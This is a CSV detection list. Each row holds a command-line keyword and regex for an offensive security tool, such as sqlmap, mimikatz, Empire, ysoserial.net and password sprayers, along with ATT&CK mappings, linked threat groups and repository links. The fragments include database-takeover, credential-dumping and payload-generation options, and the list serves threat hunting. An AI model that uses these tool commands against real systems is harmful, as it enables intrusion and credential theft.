"* oracle-tns-version.nse*",".{0,1000}\soracle\-tns\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2459"
"* --os-bof*",".{0,1000}\s\-\-os\-bof.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","2460"
"* --os-cmd whoami*",".{0,1000}\s\-\-os\-cmd\swhoami.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","2461"
"* --os-pwn*",".{0,1000}\s\-\-os\-pwn.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","2463"
"* --os-smbrelay*",".{0,1000}\s\-\-os\-smbrelay.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","2464"
"* ouned_smbserver.py*",".{0,1000}\souned_smbserver\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","2465"
"* --outdir ldapdomaindump *",".{0,1000}\s\-\-outdir\sldapdomaindump\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2466"
"* Out-Minidump.ps1*",".{0,1000}\sOut\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","2467"
"* --outpath * --config *.json --backdoor*",".{0,1000}\s\-\-outpath\s.{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-backdoor.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","2468"
"* --outpath *.json --backdoor*",".{0,1000}\s\-\-outpath\s.{0,1000}\.json\s\-\-backdoor.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","2469"
"* --output rootDSEs.json --dump*",".{0,1000}\s\-\-output\srootDSEs\.json\s\-\-dump.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","2470"
"* -OutputAssembly ""sl0p.dll""*",".{0,1000}\s\-OutputAssembly\s\""sl0p\.dll\"".{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for Windows","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/ASkyeye/win-server2022-UAC-Bypass","1","0","N/A","N/A","9","1","0","1","2024-02-04T00:10:43Z","2021-09-25T03:36:02Z","2471"
"* ovs-agent-version.nse*",".{0,1000}\sovs\-agent\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2472"
"* owa * --user-as-pass *",".{0,1000}\sowa\s.{0,1000}\s\-\-user\-as\-pass\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","2473"
"* owa_enum_activesync.py*",".{0,1000}\sowa_enum_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2474"
"* owa_spray_activesync.py*",".{0,1000}\sowa_spray_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2475"
"* owa-sprayed-creds.txt*",".{0,1000}\sowa\-sprayed\-creds\.txt.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","2476"
"* oxidfind -i *",".{0,1000}\soxidfind\s\-i\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","2477"
"* oxidfind -n *",".{0,1000}\soxidfind\s\-n\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","2478"
"* -p * --amsi-bypass *",".{0,1000}\s\-p\s.{0,1000}\s\-\-amsi\-bypass\s.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2479"
"* -p * -d *.dll -e OpenProcess*",".{0,1000}\s\-p\s.{0,1000}\s\-d\s.{0,1000}\.dll\s\-e\sOpenProcess.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","N/A","10","8","751","88","2024-09-04T17:11:58Z","2023-02-05T13:50:15Z","2480"
"* -p *\mimi.out*",".{0,1000}\s\-p\s.{0,1000}\\mimi\.out.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","2481"
"* -p 1337:1337 -p 5000:5000*",".{0,1000}\s\-p\s1337\:1337\s\-p\s5000\:5000.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","2482"
"* -p 4444 -c powershell*",".{0,1000}\s\-p\s4444\s\-c\spowershell.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","0","N/A","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","2483"
"* -p 4644 -n mal*",".{0,1000}\s\-p\s4644\s\-n\smal.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","2484"
"* -p 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'*",".{0,1000}\s\-p\s\'aad3b435b51404eeaad3b435b51404ee\:31d6cfe0d16ae931b73c59d7e0c089c0\'.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","0","N/A","AD Enumeration","6","4","308","66","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z","2485"
"* -p ActivatorUrl*",".{0,1000}\s\-p\sActivatorUrl.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","2486"
"* -p Altserialization*",".{0,1000}\s\-p\sAltserialization.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","2487"
"* -p CommonsCollections1 -c whoami*",".{0,1000}\s\-p\sCommonsCollections1\s\-c\swhoami.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","2488"
"* -p DotNetNuke*",".{0,1000}\s\-p\sDotNetNuke.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","2489"
"* -p LastLogonTimestamp -p LastLogonUserName *",".{0,1000}\s\-p\sLastLogonTimestamp\s\-p\sLastLogonUserName\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","2490"
"* -p powershell -i *.ps1 -o *.vba*",".{0,1000}\s\-p\spowershell\s\-i\s.{0,1000}\.ps1\s\-o\s.{0,1000}\.vba.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","N/A","8","6","507","123","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z","2491"
"* -p pwd1.list pwd2.list *",".{0,1000}\s\-p\spwd1\.list\spwd2\.list\s.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","2492"
"* -p SessionSecurityTokenHandler*",".{0,1000}\s\-p\sSessionSecurityTokenHandler.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","2493"
"* -p shellcode -i *.bin -o *.vba*",".{0,1000}\s\-p\sshellcode\s\-i\s.{0,1000}\.bin\s\-o\s.{0,1000}\.vba.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","N/A","8","6","507","123","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z","2494"
"* -p test_passwords.txt*",".{0,1000}\s\-p\stest_passwords\.txt.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2495"
"* -p TransactionManagerReenlist*",".{0,1000}\s\-p\sTransactionManagerReenlist.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","2496"
"* -p windows/x64/exec CMD=*.exe -f rust*",".{0,1000}\s\-p\swindows\/x64\/exec\sCMD\=.{0,1000}\.exe\s\-f\srust.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2497"
"* -p windows/x64/messagebox TITLE=NovaLdr *",".{0,1000}\s\-p\swindows\/x64\/messagebox\sTITLE\=NovaLdr\s.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","2498"
"*' p::d '*",".{0,1000}\'\sp\:\:d\s\'.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","2499"
"* -p:AssemblyName=inveigh*",".{0,1000}\s\-p\:AssemblyName\=inveigh.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","2500"
"* p2p-conficker.nse*",".{0,1000}\sp2p\-conficker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2501"
"* --pacu-help*",".{0,1000}\s\-\-pacu\-help.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","2503"
"* paloalto_enum_globalprotectportal.py*",".{0,1000}\spaloalto_enum_globalprotectportal\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2508"
"* paloalto_spray_globalprotectportal.py*",".{0,1000}\spaloalto_spray_globalprotectportal\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2509"
"* pamspy_event.h*",".{0,1000}\spamspy_event\.h.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","2510"
"* panix.sh --*",".{0,1000}\spanix\.sh\s\-\-.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","2511"
